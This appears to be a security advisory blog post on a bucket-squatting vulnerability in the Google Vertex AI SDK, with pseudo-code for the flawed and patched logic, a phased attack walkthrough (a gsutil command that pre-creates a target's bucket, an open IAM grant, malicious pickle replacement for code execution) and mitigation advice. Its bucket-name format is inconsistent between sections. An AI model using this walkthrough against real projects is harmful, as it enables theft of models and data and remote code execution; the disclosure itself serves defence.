Feb 21, 2026·6 min read·5 visits
The Vertex AI SDK generated predictable GCS bucket names. Attackers could create these buckets first (squatting). Victim data goes to attacker; attacker code goes to victim. Update SDK to v1.133.0+.
A classic 'Bucket Squatting' vulnerability in the Google Cloud Vertex AI SDK allows unauthenticated attackers to hijack the default storage used by machine learning experiments. By predicting the name of the Google Cloud Storage (GCS) bucket that the SDK automatically generates—based on the victim's Project ID and region—an attacker can pre-create this bucket in their own tenant. When the victim initializes their Vertex AI environment using default settings, their proprietary models, datasets, and training logs are unwittingly uploaded to the attacker's infrastructure. Furthermore, this channel can be reversed to inject malicious serialized objects, leading to Cross-Tenant Remote Code Execution (RCE).
In the world of MLOps, friction is the enemy. Data scientists want to train models, not provision infrastructure. Google knows this, which is why the Vertex AI SDK (google-cloud-aiplatform) is packed with 'magic' defaults. When you initialize an experiment using aiplatform.init(), you don't have to specify a staging bucket. The SDK, in its infinite helpfulness, says, "Don't worry, I'll handle the plumbing."
And here lies the problem. Automation requires predictability. For the SDK to automatically find or create a bucket for your project without asking you for a name, it must use a deterministic algorithm to generate that name. It takes your Google Cloud Project ID, adds your region, and appends a static suffix.
But in the cloud, convenience is often a backdoor. Because Google Cloud Storage (GCS) operates on a single, global namespace, bucket names must be unique across all Google customers. If I know what your bucket is going to be named before you do, and I create it first, I own it. It doesn't matter that it contains your Project ID in the string. Possession is nine-tenths of the law, and in GCS, the account that creates the bucket owns the IAM policy.
The vulnerability (CWE-340: Predictability Problems) stems from how python-aiplatform constructed these default names. Prior to version 1.133.0, the logic was effectively:
bucket_name = f"vertex-ai-experiments-{project_id}-{region}"
This string is entirely predictable. Project IDs are often public or easily guessable (e.g., company-name-prod, startup-dev). The region is usually one of the major hubs (like us-central1).
The flaw isn't just in the naming; it's in the verification. When the SDK initializes, it performs a check: "Does this bucket exist?" If the answer is "No," it creates it. If the answer is "Yes," it assumes the bucket belongs to the user and proceeds to upload sensitive artifacts. It failed to verify ownership.
This is the digital equivalent of mailing your tax returns to an address you found in the phone book without checking who actually lives there. If an attacker has already moved into 123 Vertex Lane, they are going to get your mail.
Let's look at the logic flow that enabled this. The vulnerable code path relied on standard GCS API calls that are indiscriminate regarding tenant boundaries.
The Vulnerable Logic (Conceptual):
# pseudo-code of the pre-patched logic
def get_default_bucket(project_id, region):
# 1. Deterministic Name Generation
name = f"vertex-ai-cloud-ml-{project_id}-{region}"
bucket = storage_client.bucket(name)
# 2. The Check-and-Use Race
if not bucket.exists():
bucket.create(project=project_id)
# 3. Implicit Trust
return bucketThe fix introduced in version 1.133.0 does two critical things: it adds entropy to the name (making it impossible to guess) and validates the project number of the bucket owner.
The Fix (Conceptual):
# pseudo-code of the patched logic
def get_default_bucket(project_id, region):
# 1. Verification of Ownership
if bucket.exists():
if bucket.project_number != current_user_project_number:
raise SecurityException("Bucket exists but belongs to another project!")
# 2. Entropy (if creating new)
suffix = random_string(8)
name = f"vertex-ai-{project_id}-{region}-{suffix}"
return create_bucket(name)By enforcing an ownership check, the SDK ensures that even if a squatter did guess the name, the client would refuse to upload data to it.
Exploiting this requires no special tools—just a valid GCP account and a bit of patience. Here is how an attacker executes the "Bucket Squatting" attack against a target organization.
Phase 1: Reconnaissance
The attacker identifies target Project IDs. This is easier than it sounds. They can be found in public GitHub repositories (embedded in config files), client-side JavaScript on public websites, or simply guessed (uber-internal-ml, openai-test-us).
Phase 2: The Land Grab
The attacker uses a script to iterate through common regions (us-central1, europe-west4, asia-east1) and creates the predicted buckets in their own malicious GCP project.
# Attacker creates the trap
gsutil mb gs://vertex-ai-cloud-ml-targetcorp-prod-us-central1Phase 3: The Honey Pot Configuration
The attacker must allow the victim to write to this bucket. They update the IAM policy to grant roles/storage.objectAdmin to allAuthenticatedUsers. This sounds noisy, but since the bucket name is specific to the victim, random internet users aren't likely to stumble upon it. Only the victim's SDK will try to access it.
Phase 4: Execution The victim runs their daily training job:
aiplatform.init(project="targetcorp-prod", location="us-central1")
# The SDK finds the attacker's bucket and links it.As the training job runs, it uploads model.joblib, dataset.csv, and logs containing hyperparameters directly to the attacker's storage.
The immediate impact is a Confidentiality Breach. Machine learning models are often the "crown jewels" of tech companies, costing millions in compute time to train. An attacker gets a free copy. They also get the training data, which often contains PII or sensitive financial records.
However, the Integrity and RCE impacts are darker. Vertex AI experiments often reload artifacts. If the pipeline includes a step to validate the model or deploy it, the SDK pulls the object back from the bucket.
Since the attacker owns the bucket, they can replace the legitimate model.pkl with a malicious pickle file. When the victim's python process deserializes this object to "evaluate" the model, the attacker's payload executes. This grants the attacker code execution inside the victim's Vertex AI environment—a trusted, internal network zone that likely has access to other databases and secrets.
The primary fix is to upgrade the google-cloud-aiplatform library to version 1.133.0 or later immediately. This version introduces the "Project Validation" check that kills this attack vector dead.
However, as a general security practice, relying on SDK defaults for infrastructure resources is a bad habit. Security teams should enforce explicit bucket declarations.
Secure Initialization:
# Don't do this:
# aiplatform.init(project=...)
# Do this:
aiplatform.init(
project="my-project",
location="us-central1",
staging_bucket="gs://my-manually-secured-bucket-v1"
)Additionally, organizations should run scans using tools like stratus-red-team or custom scripts to identify if any existing buckets used by their AI pipelines are hosted in projects they do not own. If you see data flowing to a bucket you can't see in your own Cloud Console, you have a problem.
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Product | Affected Versions | Fixed Version |
|---|---|---|
google-cloud-aiplatform Google | >= 1.21.0, < 1.133.0 | 1.133.0 |
| Attribute | Detail |
|---|---|
| CWE | CWE-340 (Predictability Problems) |
| CVSS | 7.7 (High) |
| Attack Vector | Network (Pre-allocation) |
| Privileges Required | None |
| Impact | Data Exfiltration & RCE |
| Exploit Status | PoC / Method Known |
The software generates a predictable identifier for a resource, allowing an attacker to pre-create or guess the identifier to hijack the resource.